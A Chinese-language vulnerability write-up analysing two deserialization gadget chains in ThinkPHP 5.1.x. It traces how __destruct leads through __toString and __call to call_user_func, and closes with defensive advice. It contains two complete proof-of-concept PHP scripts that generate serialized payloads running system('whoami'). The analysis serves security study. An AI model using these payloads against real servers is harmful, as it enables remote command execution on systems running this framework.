ThinkPHP5.1.x 反序列化利用链分析<\/h1>

环境与触发条件<\/h2>

环境<\/strong>: ThinkPHP5.1.38 + PHP7.3.4<\/li>

触发条件<\/strong>: 通过__destruct<\/code>或__wakeup<\/code>魔术方法触发<\/li> <\/ul> 测试代码<\/h2> \/\/ 测试代码通常是一个反序列化入口点 <\/span><\/span><\/span><\/span>unserialize<\/span>($_GET['data'<\/span>]); <\/span><\/span><\/code><\/pre>利用链分析<\/h2> 利用链一<\/h3> 漏洞起点<\/h4> think\process\pipes\Windows.php<\/code>中的__destruct<\/code>方法触发removeFiles<\/code>方法<\/p> public<\/span> function<\/span> __destruct() <\/span><\/span>{ <\/span><\/span> $this-><\/span>removeFiles<\/span>(); <\/span><\/span>} <\/span><\/span><\/code><\/pre>关键步骤<\/h4> removeFiles<\/code>方法<\/strong>:<\/p> 调用file_exists()<\/code>函数处理传入参数<\/li> file_exists<\/code>会将参数当作字符串处理，触发__toString<\/code>魔术方法<\/li> <\/ul> <\/li> __toString<\/code>方法<\/strong>:<\/p> 位于think\model\concern\Conversion.php<\/code><\/li> 调用toJson<\/code>方法，进而调用toArray<\/code>方法<\/li> <\/ul> <\/li> toArray<\/code>方法<\/strong>:<\/p> 寻找可控变量->方法(可控变量)<\/code>模式触发__call<\/code>魔术方法<\/li> 关键代码:$relation->visible($name)<\/code><\/li> 需要满足: $this->append<\/code>不为空(可控)<\/li> $name<\/code>不为空且不在$this->relation<\/code>中<\/li> <\/ul> <\/li> <\/ul> <\/li> getAttr<\/code>方法<\/strong>:<\/p> 位于think\model\concern\Attribute.php<\/code><\/li> 调用getData<\/code>方法，返回$this->data[$name]<\/code>(两者均可控)<\/li> <\/ul> <\/li> __call<\/code>方法<\/strong>:<\/p> 位于think\Request.php<\/code><\/li> 当$method<\/code>在$this->hook<\/code>中时触发call_user_func_array<\/code><\/li> 参数部分可控<\/li> <\/ul> <\/li> RCE触发<\/strong>:<\/p> 通过isAjax<\/code>->param<\/code>->input<\/code>调用链<\/li> input<\/code>方法中的filterValue<\/code>使用call_user_func<\/code>导致命令执行<\/li> 关键参数: $this->filter<\/code>可控(过滤函数)<\/li> $this->param<\/code>可控(命令参数)<\/li> <\/ul> <\/li> <\/ul> <\/li> <\/ol> 完整POP链<\/h4> think\process\pipes\Windows->__destruct() -> think\process\pipes\Windows->__removeFiles() -> file_exists() -> think\model\Pivot->_toString() -> think\model\Pivot->_toJson() -> think\model\Pivot->_toArray() -> think\Request->visible() -> think\Request->__call -> call_user_func_array() -> think\Request->isAjax() -> think\Request->param() -> think\Request->input() -> array_walk_recursive() -> think\Request->filterValue() -> call_user_func() <\/code><\/pre> POC代码<\/h4> <?<\/span>php<\/span> <\/span><\/span>namespace<\/span> think<\/span>{ <\/span><\/span> class<\/span> Request<\/span> { <\/span><\/span> protected<\/span> $hook =<\/span> []; <\/span><\/span> protected<\/span> $config =<\/span> []; <\/span><\/span> protected<\/span> $filter; <\/span><\/span> protected<\/span> $param =<\/span> []; <\/span><\/span> public<\/span> function<\/span> __construct(){ <\/span><\/span> $this-><\/span>filter<\/span> =<\/span> 'system'<\/span>; <\/span><\/span> $this-><\/span>param<\/span> =<\/span> ['whoami'<\/span>]; <\/span><\/span> $this-><\/span>hook<\/span> =<\/span> ['visible'<\/span>=><\/span>[$this,'isAjax'<\/span>]]; <\/span><\/span> $this-><\/span>config<\/span> =<\/span> ['var_ajax'<\/span>=><\/span>''<\/span>]; <\/span><\/span> } <\/span><\/span> } <\/span><\/span> abstract<\/span> class<\/span> Model<\/span>{ <\/span><\/span> protected<\/span> $append =<\/span> []; <\/span><\/span> private<\/span> $data =<\/span> []; <\/span><\/span> function<\/span> __construct() { <\/span><\/span> $this-><\/span>append<\/span> =<\/span> ['eas'<\/span> =><\/span> ['eas'<\/span>]]; <\/span><\/span> $this-><\/span>data<\/span> =<\/span> ['eas'<\/span> =><\/span> new<\/span> Request<\/span>()]; <\/span><\/span> } <\/span><\/span> } <\/span><\/span>} <\/span><\/span>namespace<\/span> think\model<\/span>{ <\/span><\/span> use<\/span> think\Model<\/span>; <\/span><\/span> class<\/span> Pivot<\/span> extends<\/span> Model<\/span>{} <\/span><\/span>} <\/span><\/span>namespace<\/span> think\process\pipes<\/span>{ <\/span><\/span> use<\/span> think\model\Pivot<\/span>; <\/span><\/span> class<\/span> Pipes<\/span>{} <\/span><\/span> class<\/span> Windows<\/span> extends<\/span> Pipes<\/span>{ <\/span><\/span> private<\/span> $files =<\/span> []; <\/span><\/span> function<\/span> __construct(){ <\/span><\/span> $this-><\/span>files<\/span> =<\/span> [new<\/span> Pivot<\/span>()]; <\/span><\/span> } <\/span><\/span> } <\/span><\/span>} <\/span><\/span>namespace<\/span>{ <\/span><\/span> echo<\/span> base64_encode<\/span>(serialize<\/span>(new<\/span> think\process\pipes\Windows<\/span>())); <\/span><\/span>} <\/span><\/span>?><\/span> <\/span><\/span><\/span><\/code><\/pre>利用链二<\/h3> 漏洞点<\/h4> think\model\concern\Attribute<\/code>中的getAttr<\/code>方法:<\/p> protected<\/span> function<\/span> getAttr<\/span>($name) <\/span><\/span>{ <\/span><\/span> $value =<\/span> $this-><\/span>getData<\/span>($name); <\/span><\/span> if<\/span> (isset<\/span>($this-><\/span>withAttr<\/span>[$fieldName])) { <\/span><\/span> $closure =<\/span> $this-><\/span>withAttr<\/span>[$fieldName]; <\/span><\/span> $value =<\/span> $closure($value, $this-><\/span>data<\/span>); <\/span><\/span> } <\/span><\/span> return<\/span> $value; <\/span><\/span>} <\/span><\/span><\/code><\/pre>关键步骤<\/h4> 参数控制<\/strong>:<\/p> $value<\/code>由getData<\/code>方法返回值决定(可控)<\/li> $closure<\/code>由$this->withAttr[$fieldName]<\/code>赋值(可控)<\/li> $fieldName<\/code>由Loader::parseName($name)<\/code>决定(可控)<\/li> <\/ul> <\/li> 函数调用<\/strong>:<\/p> 直接执行$closure($value, $this->data)<\/code><\/li> 可构造为任意函数调用<\/li> <\/ul> <\/li> <\/ol> 完整POP链<\/h4> think\process\pipes\Windows->__destruct() -> think\process\pipes\Windows->__removeFiles() -> file_exists() -> think\model\Pivot->_toString() -> think\model\Pivot->_toJson() -> think\model\Pivot->_toArray() -> think\model\Pivot->getAttr() -> $closure($value, $this->data) <\/code><\/pre> POC代码<\/h4> <?<\/span>php<\/span> <\/span><\/span>namespace<\/span> think<\/span>{ <\/span><\/span> abstract<\/span> class<\/span> Model<\/span>{ <\/span><\/span> private<\/span> $data =<\/span> []; <\/span><\/span> private<\/span> $withAttr =<\/span> []; <\/span><\/span> function<\/span> __construct() { <\/span><\/span> $this-><\/span>withAttr<\/span> =<\/span> ['system'<\/span> =><\/span> 'system'<\/span>]; <\/span><\/span> $this-><\/span>data<\/span> =<\/span> ['system'<\/span> =><\/span> 'whoami'<\/span>]; <\/span><\/span> } <\/span><\/span> } <\/span><\/span>} <\/span><\/span>namespace<\/span> think\model<\/span>{ <\/span><\/span> use<\/span> think\Model<\/span>; <\/span><\/span> class<\/span> Pivot<\/span> extends<\/span> Model<\/span>{} <\/span><\/span>} <\/span><\/span>namespace<\/span> think\process\pipes<\/span>{ <\/span><\/span> use<\/span> think\model\Pivot<\/span>; <\/span><\/span> class<\/span> Pipes<\/span>{} <\/span><\/span> class<\/span> Windows<\/span> extends<\/span> Pipes<\/span>{ <\/span><\/span> private<\/span> $files =<\/span> []; <\/span><\/span> function<\/span> __construct(){ <\/span><\/span> $this-><\/span>files<\/span> =<\/span> [new<\/span> Pivot<\/span>()]; <\/span><\/span> } <\/span><\/span> } <\/span><\/span>} <\/span><\/span>namespace<\/span>{ <\/span><\/span> echo<\/span> base64_encode<\/span>(serialize<\/span>(new<\/span> think\process\pipes\Windows<\/span>())); <\/span><\/span>} <\/span><\/span>?><\/span> <\/span><\/span><\/span><\/code><\/pre>总结<\/h2> 挖掘方法<\/strong>:<\/p> 正向挖掘:从__destruct<\/code>开始分析<\/li> 逆向挖掘:从危险函数(如call_user_func<\/code>)回溯<\/li> <\/ul> <\/li> 关键点<\/strong>:<\/p> 魔术方法的触发时机和条件<\/li> 参数的可控性分析<\/li> 类之间的继承和组合关系<\/li> <\/ul> <\/li> 防御建议<\/strong>:<\/p> 及时更新框架版本<\/li> 避免反序列化用户可控数据<\/li> 使用白名单限制反序列化类<\/li> <\/ul> <\/li> 学习价值<\/strong>:<\/p> 理解PHP反序列化漏洞的利用方式<\/li> 学习复杂调用链的分析方法<\/li> 掌握ThinkPHP框架的内部工作机制<\/li> <\/ul> <\/li> <\/ol>